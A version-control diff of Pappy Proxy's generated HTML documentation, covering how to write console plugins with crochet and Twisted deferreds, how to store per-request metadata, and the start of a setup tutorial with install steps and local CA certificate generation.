<span class="p">(</span><span class="s">&#39;wizard_hat&#39;</span><span class="p">,</span> <span class="s">&#39;wh&#39;</span><span class="p">),</span>
<span class="p">(</span><span class="s1">&#39;hello&#39;</span><span class="p">,</span> <span class="s1">&#39;hlo&#39;</span><span class="p">),</span>
<span class="p">(</span><span class="s1">&#39;wizard_hat&#39;</span><span class="p">,</span> <span class="s1">&#39;wh&#39;</span><span class="p">),</span>
<span class="p">])</span>
</pre></div>
</div>
@ -351,29 +355,29 @@ pappy&gt;
<p class="first admonition-title">Note</p>
<p class="last">This tutorial won&#8217;t tell you how to use inlineCallbacks in general. Type &#8220;twisted inline callbacks&#8221; into google to figure out what they are. This is mainly just a reminder to use the <code class="docutils literal"><span class="pre">crochet</span></code> wrapper for console commands and warning you that some functions may return deferreds that you may have to deal with.</p>
</div>
<p>Since you&#8217;re writing a plugin, you&#8217;ll probably be using functions which return a deferred. And to keep things readable, you&#8217;ll want to use the <code class="docutils literal"><span class="pre">defer.inlineCallbacks</span></code> function wrapper. Unfortunately, you can&#8217;t bind async functions to commands. Luckily, there&#8217;s a library called <a class="reference external" href="https://pypi.python.org/pypi/crochet">crochet</a> which lets you add another wrapper to the function that lets it be used like a blocking function. Rather than talking about it, let&#8217;s write a plugin to call <a class="reference internal" href="pappyproxy.html#pappyproxy.console.load_reqlist" title="pappyproxy.console.load_reqlist"><code class="xref py py-func docutils literal"><span class="pre">pappyproxy.console.load_reqlist()</span></code></a> to print out some requests&#8217; hosts. Let&#8217;s start by pretending it&#8217;s a normal function:</p>
<div class="highlight-python"><div class="highlight"><pre><span class="kn">import</span> <span class="nn">shlex</span>
<span class="kn">from</span> <span class="nn">pappyproxy.console</span> <span class="kn">import</span> <span class="n">load_reqlist</span>
<p>Since you&#8217;re writing a plugin, you&#8217;ll probably be using functions which return a deferred. And to keep things readable, you&#8217;ll want to use the <code class="docutils literal"><span class="pre">defer.inlineCallbacks</span></code> function wrapper. Unfortunately, you can&#8217;t bind async functions to commands. Luckily, there&#8217;s a library called <a class="reference external" href="https://pypi.python.org/pypi/crochet">crochet</a> which lets you add another wrapper to the function that lets it be used like a blocking function. Rather than talking about it, let&#8217;s write a plugin to call <a class="reference internal" href="pappyproxy.html#pappyproxy.util.load_reqlist" title="pappyproxy.util.load_reqlist"><code class="xref py py-func docutils literal"><span class="pre">pappyproxy.util.load_reqlist()</span></code></a> to print out some requests&#8217; hosts. Let&#8217;s start by pretending it&#8217;s a normal function:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="kn">import</span> <span class="nn">shlex</span>
<span class="kn">from</span> <span class="nn">pappyproxy.util</span> <span class="kn">import</span> <span class="n">load_reqlist</span>
<span class="k">def</span> <span class="nf">print_hosts</span><span class="p">(</span><span class="n">line</span><span class="p">):</span>
<span class="n">args</span> <span class="o">=</span> <span class="n">shlex</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
<span class="n">reqs</span> <span class="o">=</span> <span class="n">load_reqlist</span><span class="p">(</span><span class="n">args</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="c"># It&#39;s supposed to return a list of requests, right?</span>
<span class="n">reqs</span> <span class="o">=</span> <span class="n">load_reqlist</span><span class="p">(</span><span class="n">args</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="c1"># It&#39;s supposed to return a list of requests, right?</span>
<span class="k">for</span> <span class="n">r</span> <span class="ow">in</span> <span class="n">reqs</span><span class="p">:</span>
<span class="k">print</span> <span class="s">&#39;The host for request </span><span class="si">%s</span><span class="s"> is: </span><span class="si">%s</span><span class="s">&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">reqid</span><span class="p">,</span> <span class="n">r</span><span class="o">.</span><span class="n">host</span><span class="p">)</span>
<span class="k">print</span> <span class="s1">&#39;The host for request </span><span class="si">%s</span><span class="s1"> is: </span><span class="si">%s</span><span class="s1">&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">reqid</span><span class="p">,</span> <span class="n">r</span><span class="o">.</span><span class="n">host</span><span class="p">)</span>
<span class="c">###############</span>
<span class="c">## Plugin hooks</span>
<span class="c1">###############</span>
<span class="c1">## Plugin hooks</span>
<span class="k">def</span> <span class="nf">load_cmds</span><span class="p">(</span><span class="n">cmd</span><span class="p">):</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">set_cmds</span><span class="p">({</span>
<span class="s">&#39;print_hosts&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">print_hosts</span><span class="p">,</span> <span class="bp">None</span><span class="p">),</span>
<span class="s1">&#39;print_hosts&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">print_hosts</span><span class="p">,</span> <span class="bp">None</span><span class="p">),</span>
<span class="p">})</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">add_aliases</span><span class="p">([</span>
<span class="p">])</span>
</pre></div>
</div>
<p>And we run it:</p>
<div class="highlight-python"><div class="highlight"><pre>pappy&gt; print_hosts 1
<div class="highlight-python"><div class="highlight"><pre><span></span>pappy&gt; print_hosts 1
Traceback (most recent call last):
File &quot;/usr/local/lib/python2.7/dist-packages/cmd2.py&quot;, line 788, in onecmd_plus_hooks
stop = self.onecmd(statement)
@ -388,9 +392,9 @@ iteration over non-sequence
pappy&gt;
</pre></div>
</div>
<p>Iteration over a non-sequence? what? Well, <a class="reference internal" href="pappyproxy.html#pappyproxy.console.load_reqlist" title="pappyproxy.console.load_reqlist"><code class="xref py py-func docutils literal"><span class="pre">pappyproxy.console.load_reqlist()</span></code></a> doesn&#8217;t actually return a list of requests. It returns a deferred which returns a list of requests. I&#8217;m not going into the details (look up some stuff on using inline callbacks with Twisted if you want more info), but the way to fix it is to slap an <code class="docutils literal"><span class="pre">inlineCallbacks</span></code> wrapper on the function and <code class="docutils literal"><span class="pre">yield</span></code> the result of the function. Now it looks like this:</p>
<div class="highlight-python"><div class="highlight"><pre><span class="kn">import</span> <span class="nn">shlex</span>
<span class="kn">from</span> <span class="nn">pappyproxy.console</span> <span class="kn">import</span> <span class="n">load_reqlist</span>
<p>Iteration over a non-sequence? what? Well, <a class="reference internal" href="pappyproxy.html#pappyproxy.util.load_reqlist" title="pappyproxy.util.load_reqlist"><code class="xref py py-func docutils literal"><span class="pre">pappyproxy.util.load_reqlist()</span></code></a> doesn&#8217;t actually return a list of requests. It returns a deferred which returns a list of requests. I&#8217;m not going into the details (look up some stuff on using inline callbacks with Twisted if you want more info), but the way to fix it is to slap an <code class="docutils literal"><span class="pre">inlineCallbacks</span></code> wrapper on the function and <code class="docutils literal"><span class="pre">yield</span></code> the result of the function. Now it looks like this:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="kn">import</span> <span class="nn">shlex</span>
<span class="kn">from</span> <span class="nn">pappyproxy.util</span> <span class="kn">import</span> <span class="n">load_reqlist</span>
<span class="kn">from</span> <span class="nn">twisted.internet</span> <span class="kn">import</span> <span class="n">defer</span>
<span class="nd">@defer.inlineCallbacks</span>
@ -398,23 +402,23 @@ pappy&gt;
<span class="n">args</span> <span class="o">=</span> <span class="n">shlex</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
<span class="n">reqs</span> <span class="o">=</span> <span class="k">yield</span> <span class="n">load_reqlist</span><span class="p">(</span><span class="n">args</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span>
<span class="k">for</span> <span class="n">r</span> <span class="ow">in</span> <span class="n">reqs</span><span class="p">:</span>
<span class="k">print</span> <span class="s">&#39;The host for request </span><span class="si">%s</span><span class="s"> is: </span><span class="si">%s</span><span class="s">&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">reqid</span><span class="p">,</span> <span class="n">r</span><span class="o">.</span><span class="n">host</span><span class="p">)</span>
<span class="k">print</span> <span class="s1">&#39;The host for request </span><span class="si">%s</span><span class="s1"> is: </span><span class="si">%s</span><span class="s1">&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">reqid</span><span class="p">,</span> <span class="n">r</span><span class="o">.</span><span class="n">host</span><span class="p">)</span>
<span class="c">###############</span>
<span class="c">## Plugin hooks</span>
<span class="c1">###############</span>
<span class="c1">## Plugin hooks</span>
<span class="k">def</span> <span class="nf">load_cmds</span><span class="p">(</span><span class="n">cmd</span><span class="p">):</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">set_cmds</span><span class="p">({</span>
<span class="s">&#39;print_hosts&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">print_hosts</span><span class="p">,</span> <span class="bp">None</span><span class="p">),</span>
<span class="s1">&#39;print_hosts&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">print_hosts</span><span class="p">,</span> <span class="bp">None</span><span class="p">),</span>
<span class="p">})</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">add_aliases</span><span class="p">([</span>
<span class="p">])</span>
</pre></div>
</div>
<p>However, the console assumes that any functions it calls will be blocking. As a result, we need to add the <code class="docutils literal"><span class="pre">crochet.wait_for</span></code> wrapper:</p>
<div class="highlight-python"><div class="highlight"><pre><span class="kn">import</span> <span class="nn">shlex</span>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="kn">import</span> <span class="nn">shlex</span>
<span class="kn">import</span> <span class="nn">crochet</span>
<span class="kn">from</span> <span class="nn">pappyproxy.console</span> <span class="kn">import</span> <span class="n">load_reqlist</span>
<span class="kn">from</span> <span class="nn">pappyproxy.util</span> <span class="kn">import</span> <span class="n">load_reqlist</span>
<span class="kn">from</span> <span class="nn">twisted.internet</span> <span class="kn">import</span> <span class="n">defer</span>
<span class="nd">@crochet.wait_for</span><span class="p">(</span><span class="n">timeout</span><span class="o">=</span><span class="bp">None</span><span class="p">)</span>
@ -423,14 +427,14 @@ pappy&gt;
<span class="n">args</span> <span class="o">=</span> <span class="n">shlex</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
<span class="n">reqs</span> <span class="o">=</span> <span class="k">yield</span> <span class="n">load_reqlist</span><span class="p">(</span><span class="n">args</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span>
<span class="k">for</span> <span class="n">r</span> <span class="ow">in</span> <span class="n">reqs</span><span class="p">:</span>
<span class="k">print</span> <span class="s">&#39;The host for request </span><span class="si">%s</span><span class="s"> is: </span><span class="si">%s</span><span class="s">&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">reqid</span><span class="p">,</span> <span class="n">r</span><span class="o">.</span><span class="n">host</span><span class="p">)</span>
<span class="k">print</span> <span class="s1">&#39;The host for request </span><span class="si">%s</span><span class="s1"> is: </span><span class="si">%s</span><span class="s1">&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">reqid</span><span class="p">,</span> <span class="n">r</span><span class="o">.</span><span class="n">host</span><span class="p">)</span>
<span class="c">###############</span>
<span class="c">## Plugin hooks</span>
<span class="c1">###############</span>
<span class="c1">## Plugin hooks</span>
<span class="k">def</span> <span class="nf">load_cmds</span><span class="p">(</span><span class="n">cmd</span><span class="p">):</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">set_cmds</span><span class="p">({</span>
<span class="s">&#39;print_hosts&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">print_hosts</span><span class="p">,</span> <span class="bp">None</span><span class="p">),</span>
<span class="s1">&#39;print_hosts&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">print_hosts</span><span class="p">,</span> <span class="bp">None</span><span class="p">),</span>
<span class="p">})</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">add_aliases</span><span class="p">([</span>
<span class="p">])</span>
@ -462,21 +466,21 @@ pappy&gt;
</div>
<div class="section" id="storing-custom-request-metadata">
<h3><a class="toc-backref" href="#id15">Storing Custom Request Metadata</a><a class="headerlink" href="#storing-custom-request-metadata" title="Permalink to this headline"></a></h3>
<p><a class="reference internal" href="pappyproxy.html#pappyproxy.http.Request" title="pappyproxy.http.Request"><code class="xref py py-class docutils literal"><span class="pre">pappyproxy.http.Request</span></code></a> objects have a <code class="docutils literal"><span class="pre">plugin_data</span></code> attribute. It is a dictionary that is intended to be used by plugins to give the request custom metadata. If you want to store metadata about a request, it is suggested that you add a key to this dictionary and store any metadata you want under that key. You can use <code class="xref py py-func docutils literal"><span class="pre">pappyproxy.http.Request.get_plugin_dict()</span></code> to get a dictionary for a specific name. It will create an entry for that name if it doesn&#8217;t exist. I also suggest defining a function plugin-wide for getting the plugin&#8217;s data dict from a specific request. Since dictionaries are always passed by reference, any modifications you make to the returned dict will be applied to the request as well.</p>
<p><a class="reference internal" href="pappyproxy.html#pappyproxy.http.Request" title="pappyproxy.http.Request"><code class="xref py py-class docutils literal"><span class="pre">pappyproxy.http.Request</span></code></a> objects have a <code class="docutils literal"><span class="pre">plugin_data</span></code> attribute. It is a dictionary that is intended to be used by plugins to give the request custom metadata. If you want to store metadata about a request, it is suggested that you add a key to this dictionary and store any metadata you want under that key. You can use <a class="reference internal" href="pappyproxy.html#pappyproxy.http.Request.get_plugin_dict" title="pappyproxy.http.Request.get_plugin_dict"><code class="xref py py-func docutils literal"><span class="pre">pappyproxy.http.Request.get_plugin_dict()</span></code></a> to get a dictionary for a specific name. It will create an entry for that name if it doesn&#8217;t exist. I also suggest defining a function plugin-wide for getting the plugin&#8217;s data dict from a specific request. Since dictionaries are always passed by reference, any modifications you make to the returned dict will be applied to the request as well.</p>
<div class="admonition note">
<p class="first admonition-title">Note</p>
<p class="last">You will need to save the request using something like <a class="reference internal" href="pappyproxy.html#pappyproxy.http.Request.save" title="pappyproxy.http.Request.save"><code class="xref py py-func docutils literal"><span class="pre">pappyproxy.http.Request.save()</span></code></a> or <a class="reference internal" href="pappyproxy.html#pappyproxy.http.Request.async_deep_save" title="pappyproxy.http.Request.async_deep_save"><code class="xref py py-func docutils literal"><span class="pre">pappyproxy.http.Request.async_deep_save()</span></code></a> in order to store the changes in the data file.</p>
</div>
<p>Here is an example plugin for storing the user-agent (if it exists) in the <code class="docutils literal"><span class="pre">plugin_data</span></code> dict of a request under the key <code class="docutils literal"><span class="pre">agent</span></code>:</p>
<div class="highlight-python"><div class="highlight"><pre><span class="kn">import</span> <span class="nn">crochet</span>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="kn">import</span> <span class="nn">crochet</span>
<span class="kn">import</span> <span class="nn">shlex</span>
<span class="kn">from</span> <span class="nn">twisted.internet</span> <span class="kn">import</span> <span class="n">defer</span>
<span class="kn">from</span> <span class="nn">pappyproxy.console</span> <span class="kn">import</span> <span class="n">load_reqlist</span>
<span class="kn">from</span> <span class="nn">pappyproxy.util</span> <span class="kn">import</span> <span class="n">load_reqlist</span>
<span class="kn">from</span> <span class="nn">pappyproxy.plugin</span> <span class="kn">import</span> <span class="n">main_context</span>
<span class="kn">from</span> <span class="nn">pappyproxy.util</span> <span class="kn">import</span> <span class="n">PappyException</span>
<span class="n">DATA_KEY</span> <span class="o">=</span> <span class="s">&#39;agent&#39;</span>
<span class="n">DATA_KEY</span> <span class="o">=</span> <span class="s1">&#39;agent&#39;</span>
<span class="k">def</span> <span class="nf">get_data</span><span class="p">(</span><span class="n">r</span><span class="p">):</span>
<span class="k">return</span> <span class="n">r</span><span class="o">.</span><span class="n">get_plugin_dict</span><span class="p">(</span><span class="n">DATA_KEY</span><span class="p">)</span>
@ -485,8 +489,8 @@ pappy&gt;
<span class="nd">@defer.inlineCallbacks</span>
<span class="k">def</span> <span class="nf">update_agent_metadata</span><span class="p">(</span><span class="n">line</span><span class="p">):</span>
<span class="k">for</span> <span class="n">r</span> <span class="ow">in</span> <span class="n">main_context</span><span class="p">()</span><span class="o">.</span><span class="n">active_requests</span><span class="p">:</span>
<span class="k">if</span> <span class="s">&#39;user-agent&#39;</span> <span class="ow">in</span> <span class="n">r</span><span class="o">.</span><span class="n">headers</span><span class="p">:</span>
<span class="n">get_data</span><span class="p">(</span><span class="n">r</span><span class="p">)[</span><span class="s">&#39;agent&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">r</span><span class="o">.</span><span class="n">headers</span><span class="p">[</span><span class="s">&#39;user-agent&#39;</span><span class="p">]</span>
<span class="k">if</span> <span class="s1">&#39;user-agent&#39;</span> <span class="ow">in</span> <span class="n">r</span><span class="o">.</span><span class="n">headers</span><span class="p">:</span>
<span class="n">get_data</span><span class="p">(</span><span class="n">r</span><span class="p">)[</span><span class="s1">&#39;agent&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">r</span><span class="o">.</span><span class="n">headers</span><span class="p">[</span><span class="s1">&#39;user-agent&#39;</span><span class="p">]</span>
<span class="k">yield</span> <span class="n">r</span><span class="o">.</span><span class="n">async_deep_save</span><span class="p">()</span>
<span class="nd">@crochet.wait_for</span><span class="p">(</span><span class="n">timeout</span><span class="o">=</span><span class="bp">None</span><span class="p">)</span>
@ -495,18 +499,18 @@ pappy&gt;
<span class="n">args</span> <span class="o">=</span> <span class="n">shlex</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
<span class="n">reqs</span> <span class="o">=</span> <span class="k">yield</span> <span class="n">load_reqlist</span><span class="p">(</span><span class="n">args</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span>
<span class="k">for</span> <span class="n">r</span> <span class="ow">in</span> <span class="n">reqs</span><span class="p">:</span>
<span class="k">if</span> <span class="s">&#39;agent&#39;</span> <span class="ow">in</span> <span class="n">get_data</span><span class="p">(</span><span class="n">r</span><span class="p">):</span>
<span class="k">print</span> <span class="s">&#39;The user agent for </span><span class="si">%s</span><span class="s"> is &quot;</span><span class="si">%s</span><span class="s">&quot;&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">reqid</span><span class="p">,</span> <span class="n">get_data</span><span class="p">(</span><span class="n">r</span><span class="p">)[</span><span class="s">&#39;agent&#39;</span><span class="p">])</span>
<span class="k">if</span> <span class="s1">&#39;agent&#39;</span> <span class="ow">in</span> <span class="n">get_data</span><span class="p">(</span><span class="n">r</span><span class="p">):</span>
<span class="k">print</span> <span class="s1">&#39;The user agent for </span><span class="si">%s</span><span class="s1"> is &quot;</span><span class="si">%s</span><span class="s1">&quot;&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">reqid</span><span class="p">,</span> <span class="n">get_data</span><span class="p">(</span><span class="n">r</span><span class="p">)[</span><span class="s1">&#39;agent&#39;</span><span class="p">])</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="s">&#39;Request </span><span class="si">%s</span><span class="s"> has no user agent data&#39;</span> <span class="o">%</span> <span class="n">r</span><span class="o">.</span><span class="n">reqid</span>
<span class="k">print</span> <span class="s1">&#39;Request </span><span class="si">%s</span><span class="s1"> has no user agent data&#39;</span> <span class="o">%</span> <span class="n">r</span><span class="o">.</span><span class="n">reqid</span>
<span class="c">###############</span>
<span class="c">## Plugin hooks</span>
<span class="c1">###############</span>
<span class="c1">## Plugin hooks</span>
<span class="k">def</span> <span class="nf">load_cmds</span><span class="p">(</span><span class="n">cmd</span><span class="p">):</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">set_cmds</span><span class="p">({</span>
<span class="s">&#39;agent_update&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">update_agent_metadata</span><span class="p">,</span> <span class="bp">None</span><span class="p">),</span>
<span class="s">&#39;view_agent&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">view_agent</span><span class="p">,</span> <span class="bp">None</span><span class="p">),</span>
<span class="s1">&#39;agent_update&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">update_agent_metadata</span><span class="p">,</span> <span class="bp">None</span><span class="p">),</span>
<span class="s1">&#39;view_agent&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">view_agent</span><span class="p">,</span> <span class="bp">None</span><span class="p">),</span>
<span class="p">})</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">add_aliases</span><span class="p">([</span>
<span class="p">])</span>
@ -515,10 +519,7 @@ pappy&gt;
</div>
<div class="section" id="useful-functions">
<h3><a class="toc-backref" href="#id16">Useful Functions</a><a class="headerlink" href="#useful-functions" title="Permalink to this headline"></a></h3>
<ul class="simple">
<li>Load a request by id: <a class="reference internal" href="pappyproxy.html#pappyproxy.http.Request.load_request" title="pappyproxy.http.Request.load_request"><code class="xref py py-func docutils literal"><span class="pre">pappyproxy.http.Request.load_request()</span></code></a></li>
<li>Create a filter from a filter string: <a class="reference internal" href="pappyproxy.html#pappyproxy.context.Filter.from_filter_string" title="pappyproxy.context.Filter.from_filter_string"><code class="xref py py-func docutils literal"><span class="pre">pappyproxy.context.Filter.from_filter_string()</span></code></a></li>
</ul>
<p>See <a class="reference internal" href="pappyproxy.html#module-pappyproxy.plugin" title="pappyproxy.plugin"><code class="xref py py-mod docutils literal"><span class="pre">pappyproxy.plugin</span></code></a> and <a class="reference internal" href="pappyproxy.html#module-pappyproxy.util" title="pappyproxy.util"><code class="xref py py-mod docutils literal"><span class="pre">pappyproxy.util</span></code></a> for useful functions</p>
</div>
</div>
<div class="section" id="built-in-plugins-as-examples">
@ -577,6 +578,9 @@ pappy&gt;
<h4>Previous topic</h4>
<p class="topless"><a href="tutorial.html"
title="previous chapter">The Pappy Proxy Tutorial</a></p>
<h4>Next topic</h4>
<p class="topless"><a href="contributing.html"
title="next chapter">Contributing</a></p>
<div role="note" aria-label="source link">
<h3>This Page</h3>
<ul class="this-page-menu">
@ -610,15 +614,18 @@ pappy&gt;
<li class="right" >
<a href="py-modindex.html" title="Python Module Index"
>modules</a> |</li>
<li class="right" >
<a href="contributing.html" title="Contributing"
>next</a> |</li>
<li class="right" >
<a href="tutorial.html" title="The Pappy Proxy Tutorial"
>previous</a> |</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.0 documentation</a> &raquo;</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.11 documentation</a> &raquo;</li>
</ul>
</div>
<div class="footer" role="contentinfo">
&copy; Copyright 2015, Rob Glew.
Created using <a href="http://sphinx-doc.org/">Sphinx</a> 1.3.3.
Created using <a href="http://sphinx-doc.org/">Sphinx</a> 1.3.6.
</div>
</body>
</html>

878
docs/build/html/pappyproxy.html vendored
View file

File diff suppressed because it is too large Load diff

12
docs/build/html/py-modindex.html vendored
View file

@ -6,7 +6,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Python Module Index &mdash; Pappy Proxy 0.2.0 documentation</title>
<title>Python Module Index &mdash; Pappy Proxy 0.2.11 documentation</title>
<link rel="stylesheet" href="_static/classic.css" type="text/css" />
<link rel="stylesheet" href="_static/pygments.css" type="text/css" />
@ -14,7 +14,7 @@
<script type="text/javascript">
var DOCUMENTATION_OPTIONS = {
URL_ROOT: './',
VERSION: '0.2.0',
VERSION: '0.2.11',
COLLAPSE_INDEX: false,
FILE_SUFFIX: '.html',
HAS_SOURCE: true
@ -23,7 +23,7 @@
<script type="text/javascript" src="_static/jquery.js"></script>
<script type="text/javascript" src="_static/underscore.js"></script>
<script type="text/javascript" src="_static/doctools.js"></script>
<link rel="top" title="Pappy Proxy 0.2.0 documentation" href="index.html" />
<link rel="top" title="Pappy Proxy 0.2.11 documentation" href="index.html" />
@ -38,7 +38,7 @@
<li class="right" >
<a href="#" title="Python Module Index"
>modules</a> |</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.0 documentation</a> &raquo;</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.11 documentation</a> &raquo;</li>
</ul>
</div>
@ -163,12 +163,12 @@
<li class="right" >
<a href="#" title="Python Module Index"
>modules</a> |</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.0 documentation</a> &raquo;</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.11 documentation</a> &raquo;</li>
</ul>
</div>
<div class="footer" role="contentinfo">
&copy; Copyright 2015, Rob Glew.
Created using <a href="http://sphinx-doc.org/">Sphinx</a> 1.3.3.
Created using <a href="http://sphinx-doc.org/">Sphinx</a> 1.3.6.
</div>
</body>
</html>

12
docs/build/html/search.html vendored
View file

@ -6,7 +6,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Search &mdash; Pappy Proxy 0.2.0 documentation</title>
<title>Search &mdash; Pappy Proxy 0.2.11 documentation</title>
<link rel="stylesheet" href="_static/classic.css" type="text/css" />
<link rel="stylesheet" href="_static/pygments.css" type="text/css" />
@ -14,7 +14,7 @@
<script type="text/javascript">
var DOCUMENTATION_OPTIONS = {
URL_ROOT: './',
VERSION: '0.2.0',
VERSION: '0.2.11',
COLLAPSE_INDEX: false,
FILE_SUFFIX: '.html',
HAS_SOURCE: true
@ -24,7 +24,7 @@
<script type="text/javascript" src="_static/underscore.js"></script>
<script type="text/javascript" src="_static/doctools.js"></script>
<script type="text/javascript" src="_static/searchtools.js"></script>
<link rel="top" title="Pappy Proxy 0.2.0 documentation" href="index.html" />
<link rel="top" title="Pappy Proxy 0.2.11 documentation" href="index.html" />
<script type="text/javascript">
jQuery(function() { Search.loadIndex("searchindex.js"); });
</script>
@ -43,7 +43,7 @@
<li class="right" >
<a href="py-modindex.html" title="Python Module Index"
>modules</a> |</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.0 documentation</a> &raquo;</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.11 documentation</a> &raquo;</li>
</ul>
</div>
@ -94,12 +94,12 @@
<li class="right" >
<a href="py-modindex.html" title="Python Module Index"
>modules</a> |</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.0 documentation</a> &raquo;</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.11 documentation</a> &raquo;</li>
</ul>
</div>
<div class="footer" role="contentinfo">
&copy; Copyright 2015, Rob Glew.
Created using <a href="http://sphinx-doc.org/">Sphinx</a> 1.3.3.
Created using <a href="http://sphinx-doc.org/">Sphinx</a> 1.3.6.
</div>
</body>
</html>

2
docs/build/html/searchindex.js vendored
View file

File diff suppressed because one or more lines are too long

270
docs/build/html/tutorial.html vendored
View file

@ -6,7 +6,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>The Pappy Proxy Tutorial &mdash; Pappy Proxy 0.2.0 documentation</title>
<title>The Pappy Proxy Tutorial &mdash; Pappy Proxy 0.2.11 documentation</title>
<link rel="stylesheet" href="_static/classic.css" type="text/css" />
<link rel="stylesheet" href="_static/pygments.css" type="text/css" />
@ -14,7 +14,7 @@
<script type="text/javascript">
var DOCUMENTATION_OPTIONS = {
URL_ROOT: './',
VERSION: '0.2.0',
VERSION: '0.2.11',
COLLAPSE_INDEX: false,
FILE_SUFFIX: '.html',
HAS_SOURCE: true
@ -23,7 +23,7 @@
<script type="text/javascript" src="_static/jquery.js"></script>
<script type="text/javascript" src="_static/underscore.js"></script>
<script type="text/javascript" src="_static/doctools.js"></script>
<link rel="top" title="Pappy Proxy 0.2.0 documentation" href="index.html" />
<link rel="top" title="Pappy Proxy 0.2.11 documentation" href="index.html" />
<link rel="next" title="Writing Plugins for the Pappy Proxy" href="pappyplugins.html" />
<link rel="prev" title="The Pappy Proxy" href="overview.html" />
</head>
@ -43,7 +43,7 @@
<li class="right" >
<a href="overview.html" title="The Pappy Proxy"
accesskey="P">previous</a> |</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.0 documentation</a> &raquo;</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.11 documentation</a> &raquo;</li>
</ul>
</div>
@ -104,11 +104,11 @@
<h3><a class="toc-backref" href="#id3">Getting Started</a><a class="headerlink" href="#getting-started" title="Permalink to this headline"></a></h3>
<p>The first thing you&#8217;ll need to do is get Pappy installed.</p>
<p>Install from pypi:</p>
<div class="highlight-python"><div class="highlight"><pre>$ pip install pappy
<div class="highlight-python"><div class="highlight"><pre><span></span>$ pip install pappy
</pre></div>
</div>
<p>or install from source:</p>
<div class="highlight-python"><div class="highlight"><pre>$ git clone --recursive https://github.com/roglew/pappy-proxy.git
<div class="highlight-python"><div class="highlight"><pre><span></span>$ git clone --recursive https://github.com/roglew/pappy-proxy.git
$ cd pappy-proxy
$ pip install .
</pre></div>
@ -118,7 +118,7 @@ $ pip install .
<p class="last">Pappy only supports OS X and Linux! Nothing will work on Windows, sorry!</p>
</div>
<p>That was easy! Make a project directory anywhere for Natas and fire up Pappy.:</p>
<div class="highlight-python"><div class="highlight"><pre>$ mkdir natas
<div class="highlight-python"><div class="highlight"><pre><span></span>$ mkdir natas
$ cd natas
Copying default config to ./config.json
Proxy is listening on port 8000
@ -136,7 +136,7 @@ pappy&gt;
<h3><a class="toc-backref" href="#id4">Installing Pappy&#8217;s CA Cert</a><a class="headerlink" href="#installing-pappy-s-ca-cert" title="Permalink to this headline"></a></h3>
<p>In order to intercept HTTPS requests, you&#8217;ll need to add a CA cert to your browser. Installing the cert allows Pappy to act like a certificate authority and sign certificates for whatever it wants without your browser complaining.</p>
<p>To generate certificates, you&#8217;ll use the <code class="docutils literal"><span class="pre">gencerts</span></code> command. This will generate certificates in Pappy&#8217;s directory. By default, all projects will use the certs in this directory, so you should only have to generate/install the certificates once.:</p>
<div class="highlight-python"><div class="highlight"><pre>pappy&gt; gencerts
